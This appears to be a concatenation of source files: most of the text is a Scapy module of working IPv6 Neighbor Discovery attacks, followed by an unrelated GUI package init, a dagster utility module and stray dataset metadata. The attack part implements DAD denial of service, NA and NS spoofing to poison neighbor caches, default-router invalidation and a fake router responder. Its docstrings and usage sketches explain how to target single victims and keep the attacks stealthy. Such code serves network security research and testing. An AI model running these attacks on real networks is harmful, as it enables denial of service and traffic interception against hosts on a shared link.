print "Reply NS for target address %s (received from %s)" % (tgt, mac)
_NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter,
tgt_filter, reply_mac)
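# Hypothetical usage sketch (interface and MAC are placeholders): answer only
# the DAD NS messages emitted by a single victim NIC on eth0.
#
#   NDP_Attack_DAD_DoS_via_NS(iface="eth0", mac_src_filter="00:13:72:8c:b5:69")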
def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None,
reply_mac=None):
"""
    Perform the DAD DoS attack using NA described in section 4.1.3 of RFC
    3756. This is done by listening for incoming NS messages *sent from the
unspecified address* and sending a NA reply for the target address,
leading the peer to believe that another node is also performing DAD
for that address.
By default, the fake NA sent to create the DoS uses:
- as target address the target address found in received NS.
- as IPv6 source address: the target address found in received NS.
- as IPv6 destination address: the link-local solicited-node multicast
address derived from the target address in received NS.
- the mac address of the interface as source (or reply_mac, see below).
- the multicast mac address derived from the solicited node multicast
address used as IPv6 destination address.
- A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled
with the mac address used as source of the NA.
Following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only NS messages received from this source will trigger replies.
This allows limiting the effects of the DoS to a single target by
filtering on its mac address. The default value is None: the DoS
is not limited to a specific mac address.
tgt_filter: Same as previous but for a specific target IPv6 address for
received NS. If the target address in the NS message (not the IPv6
destination address) matches that address, then a fake reply will
be sent, i.e. the emitter will be a target of the DoS.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface. This
address will also be used in the Target Link-Layer Address option.
"""
def na_reply_callback(req, reply_mac, iface):
"""
Callback that reply to a NS with a NA
"""
# Let's build a reply and send it
mac = req[Ether].src
dst = req[IPv6].dst
tgt = req[ICMPv6ND_NS].tgt
rep = Ether(src=reply_mac)/IPv6(src=tgt, dst=dst)
rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1)
rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
sendp(rep, iface=iface, verbose=0)
print "Reply NA for target address %s (received from %s)" % (tgt, mac)
_NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter,
tgt_filter, reply_mac)
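# Hypothetical usage sketch (address is a placeholder): note that tgt_filter
# expects the packed form of the address, as compared inside
# _NDP_Attack_DAD_DoS() above.
#
#   tgt = socket.inet_pton(socket.AF_INET6, "fe80::211:22ff:fe33:4455")
#   NDP_Attack_DAD_DoS_via_NA(iface="eth0", tgt_filter=tgt)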
def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None,
reply_mac=None, router=False):
"""
The main purpose of this function is to send fake Neighbor Advertisement
messages to a victim. As the emission of unsolicited Neighbor Advertisement
is pretty pointless (from an attacker standpoint) because it will not
    lead to a modification of a victim's neighbor cache, the function sends
advertisements in response to received NS (NS sent as part of the DAD,
i.e. with an unspecified address as source, are not considered).
By default, the fake NA sent to create the DoS uses:
- as target address the target address found in received NS.
- as IPv6 source address: the target address
- as IPv6 destination address: the source IPv6 address of received NS
message.
- the mac address of the interface as source (or reply_mac, see below).
     - the source mac address of the received NS as destination mac address
of the emitted NA.
- A Target Link-Layer address option (ICMPv6NDOptDstLLAddr)
filled with the mac address used as source of the NA.
Following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only NS messages received from this source will trigger replies.
This allows limiting the effects of the DoS to a single target by
filtering on its mac address. The default value is None: the DoS
is not limited to a specific mac address.
tgt_filter: Same as previous but for a specific target IPv6 address for
received NS. If the target address in the NS message (not the IPv6
destination address) matches that address, then a fake reply will
be sent, i.e. the emitter will be a target of the DoS.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface. This
address will also be used in the Target Link-Layer Address option.
router: by the default (False) the 'R' flag in the NA used for the reply
is not set. If the parameter is set to True, the 'R' flag in the
NA is set, advertising us as a router.
Please, keep the following in mind when using the function: for obvious
reasons (kernel space vs. Python speed), when the target of the address
resolution is on the link, the sender of the NS receives 2 NA messages
in a row, the valid one and our fake one. The second one will overwrite
the information provided by the first one, i.e. the natural latency of
Scapy helps here.
In practice, on a common Ethernet link, the emission of the NA from the
genuine target (kernel stack) usually occurs in the same millisecond as
    the receipt of the NS. The NA generated by Scapy6 will usually arrive some
    20 ms or more later. On a usual testbed, for instance, this difference is
sufficient to have the first data packet sent from the victim to the
destination before it even receives our fake NA.
"""
def is_request(req, mac_src_filter, tgt_filter):
"""
Check if packet req is a request
"""
# Those simple checks are based on Section 5.4.2 of RFC 4862
if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
return 0
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
# Source must NOT be the unspecified address
if req[IPv6].src == "::":
return 0
tgt = socket.inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
if tgt_filter and tgt != tgt_filter:
return 0
dst = req[IPv6].dst
if in6_isllsnmaddr(dst): # Address is Link Layer Solicited Node mcast.
# If this is a real address resolution NS, then the destination
# address of the packet is the link-local solicited node multicast
# address associated with the target of the NS.
# Otherwise, the NS is a NUD related one, i.e. the peer is
# unicasting the NS to check the target is still alive (L2
# information is still in its cache and it is verified)
received_snma = socket.inet_pton(socket.AF_INET6, dst)
expected_snma = in6_getnsma(tgt)
if received_snma != expected_snma:
print "solicited node multicast @ does not match target @!"
return 0
return 1
def reply_callback(req, reply_mac, router, iface):
"""
Callback that reply to a NS with a spoofed NA
"""
# Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and
# send it back.
mac = req[Ether].src
pkt = req[IPv6]
src = pkt.src
tgt = req[ICMPv6ND_NS].tgt
rep = Ether(src=reply_mac, dst=mac)/IPv6(src=tgt, dst=src)
rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1) # target from the NS
# "If the solicitation IP Destination Address is not a multicast
# address, the Target Link-Layer Address option MAY be omitted"
# Given our purpose, we always include it.
rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
sendp(rep, iface=iface, verbose=0)
print "Reply NA for target address %s (received from %s)" % (tgt, mac)
if not iface:
iface = conf.iface
# To prevent sniffing our own traffic
if not reply_mac:
reply_mac = get_if_hwaddr(iface)
sniff_filter = "icmp6 and not ether src %s" % reply_mac
router = (router and 1) or 0 # Value of the R flags in NA
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
prn=lambda x: reply_callback(x, reply_mac, router, iface),
iface=iface)
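# Hypothetical usage sketch: spoof NA answers for every non-DAD NS seen on
# eth0, additionally advertising ourselves as a router ('R' flag set).
#
#   NDP_Attack_NA_Spoofing(iface="eth0", router=True)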
def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1",
dst=None, src_mac=None, dst_mac=None, loop=True,
inter=1, iface=None):
"""
The main purpose of this function is to send fake Neighbor Solicitations
messages to a victim, in order to either create a new entry in its neighbor
cache or update an existing one. In section 7.2.3 of RFC 4861, it is stated
that a node SHOULD create the entry or update an existing one (if it is not
currently performing DAD for the target of the NS). The entry's reachability
state is set to STALE.
The two main parameters of the function are the source link-layer address
(carried by the Source Link-Layer Address option in the NS) and the
source address of the packet.
    Unlike some other NDP_Attack_* functions, this one is not based on a
    stimulus/response model. When called, it sends the same NS packet in a loop
    every second (the default).
Following arguments can be used to change the format of the packets:
src_lladdr: the MAC address used in the Source Link-Layer Address option
included in the NS packet. This is the address that the peer should
associate in its neighbor cache with the IPv6 source address of the
packet. If None is provided, the mac address of the interface is
used.
src: the IPv6 address used as source of the packet. If None is provided,
an address associated with the emitting interface will be used
(based on the destination address of the packet).
target: the target address of the NS packet. If no value is provided,
a dummy address (2001:db8::1) is used. The value of the target
has a direct impact on the destination address of the packet if it
is not overridden. By default, the solicited-node multicast address
associated with the target is used as destination address of the
packet. Consider specifying a specific destination address if you
intend to use a target address different than the one of the victim.
dst: The destination address of the NS. By default, the solicited node
multicast address associated with the target address (see previous
parameter) is used if no specific value is provided. The victim
is not expected to check the destination address of the packet,
so using a multicast address like ff02::1 should work if you want
the attack to target all hosts on the link. On the contrary, if
you want to be more stealth, you should provide the target address
for this parameter in order for the packet to be sent only to the
victim.
src_mac: the MAC address used as source of the packet. By default, this
is the address of the interface. If you want to be more stealth,
        feel free to use something else. Note that this address is not the
        one that the victim will use to populate its neighbor cache.
dst_mac: The MAC address used as destination address of the packet. If
the IPv6 destination address is multicast (all-nodes, solicited
node, ...), it will be computed. If the destination address is
unicast, a neighbor solicitation will be performed to get the
associated address. If you want the attack to be stealth, you
can provide the MAC address using this parameter.
loop: By default, this parameter is True, indicating that NS packets
will be sent in loop, separated by 'inter' seconds (see below).
When set to False, a single packet is sent.
inter: When loop parameter is True (the default), this parameter provides
the interval in seconds used for sending NS packets.
iface: to force the sending interface.
"""
if not iface:
iface = conf.iface
# Use provided MAC address as source link-layer address option
# or the MAC address of the interface if none is provided.
if not src_lladdr:
src_lladdr = get_if_hwaddr(iface)
# Prepare packets parameters
ether_params = {}
if src_mac:
ether_params["src"] = src_mac
if dst_mac:
ether_params["dst"] = dst_mac
ipv6_params = {}
if src:
ipv6_params["src"] = src
if dst:
ipv6_params["dst"] = dst
else:
# Compute the solicited-node multicast address
# associated with the target address.
tmp = inet_ntop(socket.AF_INET6,
in6_getnsma(inet_pton(socket.AF_INET6, target)))
ipv6_params["dst"] = tmp
pkt = Ether(**ether_params)
pkt /= IPv6(**ipv6_params)
pkt /= ICMPv6ND_NS(tgt=target)
pkt /= ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr)
sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0)
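# Hypothetical usage sketch (addresses are placeholders): make the victim
# (2001:db8::1) map 2001:db8::100 to our own MAC address, unicasting the NS
# to the victim rather than to the solicited-node multicast group.
#
#   NDP_Attack_NS_Spoofing(src="2001:db8::100", target="2001:db8::100",
#                          dst="2001:db8::1", iface="eth0")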
def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None,
ip_src_filter=None, reply_mac=None,
tgt_mac=None):
"""
The purpose of the function is to monitor incoming RA messages
sent by default routers (RA with a non-zero Router Lifetime values)
and invalidate them by immediately replying with fake RA messages
advertising a zero Router Lifetime value.
The result on receivers is that the router is immediately invalidated,
i.e. the associated entry is discarded from the default router list
and destination cache is updated to reflect the change.
By default, the function considers all RA messages with a non-zero
Router Lifetime value but provides configuration knobs to allow
filtering RA sent by specific routers (Ethernet source address).
With regard to emission, the multicast all-nodes address is used
by default but a specific target can be used, in order for the DoS to
apply only to a specific host.
More precisely, following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only RA messages received from this source will trigger replies.
If other default routers advertised their presence on the link,
their clients will not be impacted by the attack. The default
value is None: the DoS is not limited to a specific mac address.
ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
on. Only RA messages received from this source address will trigger
replies. If other default routers advertised their presence on the
link, their clients will not be impacted by the attack. The default
value is None: the DoS is not limited to a specific IPv6 source
address.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface.
tgt_mac: allow limiting the effect of the DoS to a specific host,
by sending the "invalidating RA" only to its mac address.
"""
def is_request(req, mac_src_filter, ip_src_filter):
"""
Check if packet req is a request
"""
if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req):
return 0
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
ip_src = req[IPv6].src
if ip_src_filter and ip_src != ip_src_filter:
return 0
# Check if this is an advertisement for a Default Router
# by looking at Router Lifetime value
if req[ICMPv6ND_RA].routerlifetime == 0:
return 0
return 1
def ra_reply_callback(req, reply_mac, tgt_mac, iface):
"""
Callback that sends an RA with a 0 lifetime
"""
# Let's build a reply and send it
src = req[IPv6].src
# Prepare packets parameters
ether_params = {}
if reply_mac:
ether_params["src"] = reply_mac
if tgt_mac:
ether_params["dst"] = tgt_mac
# Basis of fake RA (high pref, zero lifetime)
rep = Ether(**ether_params)/IPv6(src=src, dst="ff02::1")
rep /= ICMPv6ND_RA(prf=1, routerlifetime=0)
# Add it a PIO from the request ...
tmp = req
while ICMPv6NDOptPrefixInfo in tmp:
pio = tmp[ICMPv6NDOptPrefixInfo]
tmp = pio.payload
del(pio.payload)
rep /= pio
# ... and source link layer address option
if ICMPv6NDOptSrcLLAddr in req:
mac = req[ICMPv6NDOptSrcLLAddr].lladdr
else:
mac = req[Ether].src
rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac)
sendp(rep, iface=iface, verbose=0)
print "Fake RA sent with source address %s" % src
if not iface:
iface = conf.iface
# To prevent sniffing our own traffic
if not reply_mac:
reply_mac = get_if_hwaddr(iface)
sniff_filter = "icmp6 and not ether src %s" % reply_mac
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface),
iface=iface)
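# Hypothetical usage sketch (addresses are placeholders): invalidate only the
# RAs emitted by one router, and only for a single victim host.
#
#   NDP_Attack_Kill_Default_Router(iface="eth0",
#                                  ip_src_filter="fe80::21e:bff:fe4e:3b2",
#                                  tgt_mac="00:13:72:8c:b5:69")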
def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None,
ip_src_filter=None):
"""
The purpose of this function is to send provided RA message at layer 2
(i.e. providing a packet starting with IPv6 will not work) in response
to received RS messages. In the end, the function is a simple wrapper
around sendp() that monitor the link for RS messages.
It is probably better explained with an example:
>>> ra = Ether()/IPv6()/ICMPv6ND_RA()
>>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64)
>>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64)
>>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55")
>>> NDP_Attack_Fake_Router(ra, iface="eth0")
Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573
Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae
...
Following arguments can be used to change the behavior:
ra: the RA message to send in response to received RS message.
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If none is provided, conf.iface is
used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only RS messages received from this source will trigger a reply.
       Note that no changes to the provided RA are made, which implies that if
you intend to target only the source of the RS using this option,
you will have to set the Ethernet destination address to the same
value in your RA.
The default value for this parameter is None: no filtering on the
source of RS is done.
ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
on. Only RS messages received from this source address will trigger
       replies. The same comment as for the previous argument applies: if you use
the option, you will probably want to set a specific Ethernet
destination address in the RA.
"""
def is_request(req, mac_src_filter, ip_src_filter):
"""
Check if packet req is a request
"""
if not (Ether in req and IPv6 in req and ICMPv6ND_RS in req):
return 0
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
ip_src = req[IPv6].src
if ip_src_filter and ip_src != ip_src_filter:
return 0
return 1
def ra_reply_callback(req, iface):
"""
Callback that sends an RA in reply to an RS
"""
src = req[IPv6].src
sendp(ra, iface=iface, verbose=0)
print "Fake RA sent in response to RS from %s" % src
if not iface:
iface = conf.iface
sniff_filter = "icmp6"
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
prn=lambda x: ra_reply_callback(x, iface),
iface=iface)
#############################################################################
#############################################################################
### Layers binding ###
#############################################################################
#############################################################################
conf.l3types.register(ETH_P_IPV6, IPv6)
conf.l2types.register(31, IPv6)
bind_layers(Ether, IPv6, type = 0x86dd )
bind_layers(CookedLinux, IPv6, proto = 0x86dd )
bind_layers(IPerror6, TCPerror, nh = socket.IPPROTO_TCP )
bind_layers(IPerror6, UDPerror, nh = socket.IPPROTO_UDP )
bind_layers(IPv6, TCP, nh = socket.IPPROTO_TCP )
bind_layers(IPv6, UDP, nh = socket.IPPROTO_UDP )
bind_layers(IP, IPv6, proto = socket.IPPROTO_IPV6 )
bind_layers(IPv6, IPv6, nh = socket.IPPROTO_IPV6 )
bind_layers(IPv6, IP, nh = socket.IPPROTO_IPIP )
| 39.302625
| 156
| 0.541641
|
e48975c5bc90fc7e6b83deae5ccf55ae04d73f2d
| 262
|
py
|
Python
|
einkd/gui/components/__init__.py
|
trickeydan/einkd
|
ca5bbdde8c5a6ab31ffa6745b42cb69a19eb1090
|
[
"MIT"
] | null | null | null |
einkd/gui/components/__init__.py
|
trickeydan/einkd
|
ca5bbdde8c5a6ab31ffa6745b42cb69a19eb1090
|
[
"MIT"
] | null | null | null |
einkd/gui/components/__init__.py
|
trickeydan/einkd
|
ca5bbdde8c5a6ab31ffa6745b42cb69a19eb1090
|
[
"MIT"
] | null | null | null |
"""Components in the GUI."""
from .component import Component
from .filled import FilledComponent
from .image import ImageComponent
from .text import TextComponent
__all__ = [
"Component",
"FilledComponent",
"ImageComponent",
"TextComponent",
]
| 20.153846
| 35
| 0.729008
|
292e90e0541ba067016ece7813c04bdc9c8507ad
| 14,963
|
py
|
Python
|
python_modules/dagster/dagster/utils/__init__.py
|
wingyplus/dagster
|
1771b49f58c62141628da6a767516d3dcb9637d6
|
[
"Apache-2.0"
] | null | null | null |
python_modules/dagster/dagster/utils/__init__.py
|
wingyplus/dagster
|
1771b49f58c62141628da6a767516d3dcb9637d6
|
[
"Apache-2.0"
] | null | null | null |
python_modules/dagster/dagster/utils/__init__.py
|
wingyplus/dagster
|
1771b49f58c62141628da6a767516d3dcb9637d6
|
[
"Apache-2.0"
] | null | null | null |
import contextlib
import datetime
import errno
import functools
import inspect
import multiprocessing
import os
import re
import signal
import socket
import subprocess
import sys
import tempfile
import threading
from collections import namedtuple
from enum import Enum
from warnings import warn
import six
import yaml
from six.moves import configparser
from dagster import check
from dagster.core.errors import DagsterInvariantViolationError
from dagster.seven import IS_WINDOWS, thread
from dagster.seven.abc import Mapping
from dagster.utils.merger import merge_dicts
from .yaml_utils import load_yaml_from_glob_list, load_yaml_from_globs, load_yaml_from_path
if sys.version_info > (3,):
from pathlib import Path # pylint: disable=import-error
else:
from pathlib2 import Path # pylint: disable=import-error
EPOCH = datetime.datetime.utcfromtimestamp(0)
# 2/3 compatibility
PICKLE_PROTOCOL = 2
DEFAULT_REPOSITORY_YAML_FILENAME = 'repository.yaml'
DEFAULT_WORKSPACE_YAML_FILENAME = 'workspace.yaml'
def file_relative_path(dunderfile, relative_path):
'''
This function is useful when one needs to load a file that is
relative to the position of the current file. (Such as when
    you encode a configuration file path in a source file and want
    it runnable from any current working directory.)
It is meant to be used like the following:
file_relative_path(__file__, 'path/relative/to/file')
'''
check.str_param(dunderfile, 'dunderfile')
check.str_param(relative_path, 'relative_path')
return os.path.join(os.path.dirname(dunderfile), relative_path)
def script_relative_path(file_path):
'''
Useful for testing with local files. Use a path relative to where the
test resides and this function will return the absolute path
    of that file. Otherwise it will be relative to the script that
    ran the test.
    Note: this function is very, very expensive (on the order of 1
millisecond per invocation) so this should only be used in performance
insensitive contexts. Prefer file_relative_path for anything with
performance constraints.
'''
# from http://bit.ly/2snyC6s
check.str_param(file_path, 'file_path')
scriptdir = inspect.stack()[1][1]
return os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(scriptdir)), file_path))
# Adapted from https://github.com/okunishinishi/python-stringcase/blob/master/stringcase.py
def camelcase(string):
check.str_param(string, 'string')
string = re.sub(r'^[\-_\.]', '', str(string))
if not string:
return string
return str(string[0]).upper() + re.sub(
r'[\-_\.\s]([a-z])', lambda matched: str(matched.group(1)).upper(), string[1:]
)
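# Illustrative examples (not part of the module): the regexes above strip one
# leading separator and upper-case each letter that follows a separator.
#
#   assert camelcase('hello_world') == 'HelloWorld'
#   assert camelcase('-some.value') == 'SomeValue'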
def ensure_single_item(ddict):
check.dict_param(ddict, 'ddict')
check.param_invariant(len(ddict) == 1, 'ddict', 'Expected dict with single item')
return list(ddict.items())[0]
@contextlib.contextmanager
def pushd(path):
old_cwd = os.getcwd()
os.chdir(path)
try:
yield path
finally:
os.chdir(old_cwd)
def safe_isfile(path):
'''"Backport of Python 3.8 os.path.isfile behavior.
This is intended to backport https://docs.python.org/dev/whatsnew/3.8.html#os-path. I'm not
sure that there are other ways to provoke this behavior on Unix other than the null byte,
but there are certainly other ways to do it on Windows. Afaict, we won't mask other
ValueErrors, and the behavior in the status quo ante is rough because we risk throwing an
unexpected, uncaught ValueError from very deep in our logic.
'''
try:
return os.path.isfile(path)
except ValueError:
return False
def mkdir_p(path):
try:
os.makedirs(path)
return path
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
class frozendict(dict):
def __readonly__(self, *args, **kwargs):
raise RuntimeError("Cannot modify ReadOnlyDict")
# https://docs.python.org/3/library/pickle.html#object.__reduce__
#
# For a dict, the default behavior for pickle is to iteratively call __setitem__ (see 5th item
# in __reduce__ tuple). Since we want to disable __setitem__ and still inherit dict, we
# override this behavior by defining __reduce__. We return the 3rd item in the tuple, which is
# passed to __setstate__, allowing us to restore the frozendict.
def __reduce__(self):
return (frozendict, (), dict(self))
def __setstate__(self, state):
self.__init__(state)
__setitem__ = __readonly__
__delitem__ = __readonly__
pop = __readonly__
popitem = __readonly__
clear = __readonly__
update = __readonly__
setdefault = __readonly__
del __readonly__
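# Illustrative sketch (not part of the module): because __reduce__ hands the
# full mapping to __setstate__, pickling round-trips without ever touching the
# disabled __setitem__.
#
#   import pickle
#   fd = frozendict({'a': 1})
#   assert pickle.loads(pickle.dumps(fd)) == {'a': 1}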
class frozenlist(list):
def __readonly__(self, *args, **kwargs):
raise RuntimeError("Cannot modify ReadOnlyList")
__setitem__ = __readonly__
__delitem__ = __readonly__
append = __readonly__
clear = __readonly__
extend = __readonly__
insert = __readonly__
pop = __readonly__
remove = __readonly__
reverse = __readonly__
sort = __readonly__
def make_readonly_value(value):
if isinstance(value, list):
return frozenlist(list(map(make_readonly_value, value)))
elif isinstance(value, dict):
return frozendict({key: make_readonly_value(value) for key, value in value.items()})
else:
return value
def get_prop_or_key(elem, key):
if isinstance(elem, Mapping):
return elem.get(key)
else:
return getattr(elem, key)
def list_pull(alist, key):
return list(map(lambda elem: get_prop_or_key(elem, key), alist))
def get_multiprocessing_context():
# Set execution method to spawn, to avoid fork and to have same behavior between platforms.
# Older versions are stuck with whatever is the default on their platform (fork on
# Unix-like and spawn on windows)
#
# https://docs.python.org/3/library/multiprocessing.html#multiprocessing.get_context
if hasattr(multiprocessing, 'get_context'):
return multiprocessing.get_context('spawn')
else:
return multiprocessing
def all_none(kwargs):
for value in kwargs.values():
if value is not None:
return False
return True
def check_script(path, return_code=0):
try:
subprocess.check_output([sys.executable, path])
except subprocess.CalledProcessError as exc:
if return_code != 0:
if exc.returncode == return_code:
return
raise
def check_cli_execute_file_pipeline(path, pipeline_fn_name, env_file=None):
cli_cmd = [
sys.executable,
'-m',
'dagster',
'pipeline',
'execute',
'-f',
path,
'-a',
pipeline_fn_name,
]
if env_file:
cli_cmd.append('-c')
cli_cmd.append(env_file)
try:
subprocess.check_output(cli_cmd)
except subprocess.CalledProcessError as cpe:
print(cpe) # pylint: disable=print-call
raise cpe
def safe_tempfile_path_unmanaged():
# This gets a valid temporary file path in the safest possible way, although there is still no
# guarantee that another process will not create a file at this path. The NamedTemporaryFile is
# deleted when the context manager exits and the file object is closed.
#
# This is preferable to using NamedTemporaryFile as a context manager and passing the name
# attribute of the file object around because NamedTemporaryFiles cannot be opened a second time
# if already open on Windows NT or later:
# https://docs.python.org/3.8/library/tempfile.html#tempfile.NamedTemporaryFile
# https://github.com/dagster-io/dagster/issues/1582
with tempfile.NamedTemporaryFile() as fd:
path = fd.name
return Path(path).as_posix()
@contextlib.contextmanager
def safe_tempfile_path():
try:
path = safe_tempfile_path_unmanaged()
yield path
finally:
if os.path.exists(path):
os.unlink(path)
def ensure_gen(thing_or_gen):
if not inspect.isgenerator(thing_or_gen):
def _gen_thing():
yield thing_or_gen
return _gen_thing()
return thing_or_gen
def ensure_dir(file_path):
try:
os.makedirs(file_path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def ensure_file(path):
ensure_dir(os.path.dirname(path))
if not os.path.exists(path):
touch_file(path)
def touch_file(path):
ensure_dir(os.path.dirname(path))
with open(path, 'a'):
os.utime(path, None)
def _kill_on_event(termination_event):
termination_event.wait()
if IS_WINDOWS:
        # This will raise a KeyboardInterrupt in python land - meaning this won't be able to
# interrupt things like sleep()
thread.interrupt_main()
else:
# If on unix send an os level signal to interrupt any situation we may be stuck in
os.kill(os.getpid(), signal.SIGINT)
# Function to be invoked by daemon thread in processes which seek to be cancellable.
# The motivation for this approach is to be able to exit cleanly on Windows. An alternative
# path is to change how the processes are opened and send CTRL_BREAK signals, which at
# the time of authoring seemed a more costly approach.
#
# Reading for the curious:
# * https://stackoverflow.com/questions/35772001/how-to-handle-the-signal-in-python-on-windows-machine
# * https://stefan.sofa-rockers.org/2013/08/15/handling-sub-process-hierarchies-python-linux-os-x/
def start_termination_thread(termination_event):
check.inst_param(
termination_event, 'termination_event', ttype=type(get_multiprocessing_context().Event())
)
int_thread = threading.Thread(
target=_kill_on_event, args=(termination_event,), name='kill-on-event'
)
int_thread.daemon = True
int_thread.start()
def datetime_as_float(dt):
check.inst_param(dt, 'dt', datetime.datetime)
return float((dt - EPOCH).total_seconds())
# hashable frozen string to string dict
class frozentags(frozendict):
def __init__(self, *args, **kwargs):
super(frozentags, self).__init__(*args, **kwargs)
check.dict_param(self, 'self', key_type=str, value_type=str)
def __hash__(self):
return hash(tuple(sorted(self.items())))
def updated_with(self, new_tags):
check.dict_param(new_tags, 'new_tags', key_type=str, value_type=str)
updated = dict(self)
for key, value in new_tags.items():
updated[key] = value
return frozentags(updated)
class EventGenerationManager(object):
''' Utility class that wraps an event generator function, that also yields a single instance of
a typed object. All events yielded before the typed object are yielded through the method
`generate_setup_events` and all events yielded after the typed object are yielded through the
method `generate_teardown_events`.
This is used to help replace the context managers used in pipeline initialization with
generators so that we can begin emitting initialization events AND construct a pipeline context
object, while managing explicit setup/teardown.
This does require calling `generate_setup_events` AND `generate_teardown_events` in order to
get the typed object.
'''
def __init__(self, generator, object_cls, require_object=True):
self.generator = check.generator(generator)
self.object_cls = check.type_param(object_cls, 'object_cls')
self.require_object = check.bool_param(require_object, 'require_object')
self.object = None
self.did_setup = False
self.did_teardown = False
def generate_setup_events(self):
self.did_setup = True
try:
while self.object is None:
obj = next(self.generator)
if isinstance(obj, self.object_cls):
self.object = obj
else:
yield obj
except StopIteration:
if self.require_object:
check.inst_param(
self.object,
'self.object',
self.object_cls,
'generator never yielded object of type {}'.format(self.object_cls.__name__),
)
def get_object(self):
if not self.did_setup:
check.failed('Called `get_object` before `generate_setup_events`')
return self.object
def generate_teardown_events(self):
self.did_teardown = True
if self.object:
for event in self.generator:
yield event
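# Hypothetical usage sketch (the generator and context class are placeholders):
#
#   manager = EventGenerationManager(init_events(), PipelineContext)
#   for event in manager.generate_setup_events():
#       handle(event)                      # events yielded before the object
#   context = manager.get_object()         # the typed object itself
#   # ... use the context ...
#   for event in manager.generate_teardown_events():
#       handle(event)                      # events yielded after the object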
def utc_datetime_from_timestamp(timestamp):
tz = None
if sys.version_info.major >= 3 and sys.version_info.minor >= 2:
from datetime import timezone
tz = timezone.utc
else:
import pytz
tz = pytz.utc
return datetime.datetime.fromtimestamp(timestamp, tz=tz)
def is_enum_value(value):
return False if value is None else issubclass(value.__class__, Enum)
def git_repository_root():
return six.ensure_str(subprocess.check_output(['git', 'rev-parse', '--show-toplevel']).strip())
def segfault():
'''Reliable cross-Python version segfault.
https://bugs.python.org/issue1215#msg143236
'''
import ctypes
ctypes.string_at(0)
def find_free_port():
with contextlib.closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind(('', 0))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
@contextlib.contextmanager
def alter_sys_path(to_add, to_remove):
to_restore = [path for path in sys.path]
# remove paths
for path in to_remove:
if path in sys.path:
sys.path.remove(path)
# add paths
for path in to_add:
sys.path.insert(0, path)
try:
yield
finally:
sys.path = to_restore
@contextlib.contextmanager
def restore_sys_modules():
sys_modules = {k: v for k, v in sys.modules.items()}
try:
yield
finally:
sys.modules = sys_modules
def process_is_alive(pid):
if IS_WINDOWS:
import psutil # pylint: disable=import-error
return psutil.pid_exists(pid=pid)
else:
try:
subprocess.check_output(['ps', str(pid)])
except subprocess.CalledProcessError as exc:
assert exc.returncode == 1
return False
return True
def compose(*args):
'''
Compose python functions args such that compose(f, g)(x) is equivalent to f(g(x)).
'''
# reduce using functional composition over all the arguments, with the identity function as
# initializer
return functools.reduce(lambda f, g: lambda x: f(g(x)), args, lambda x: x)
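# Illustrative sketch (not part of the module):
#
#   add_one = lambda x: x + 1
#   double = lambda x: x * 2
#   assert compose(add_one, double)(3) == 7    # add_one(double(3))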
| 29.629703
| 103
| 0.682818
|
0ff3c4c0e69651b300fbd198307e9b31a6f4b23f
| 981
|
py
|
Python
|
python/dynamic_graph/sot/torque_control/tests/test_chirp.py
|
jviereck/sot-torque-control
|
90409a656e5b5be4dd4ff937724154579861c20f
|
[
"BSD-2-Clause"
] | null | null | null |
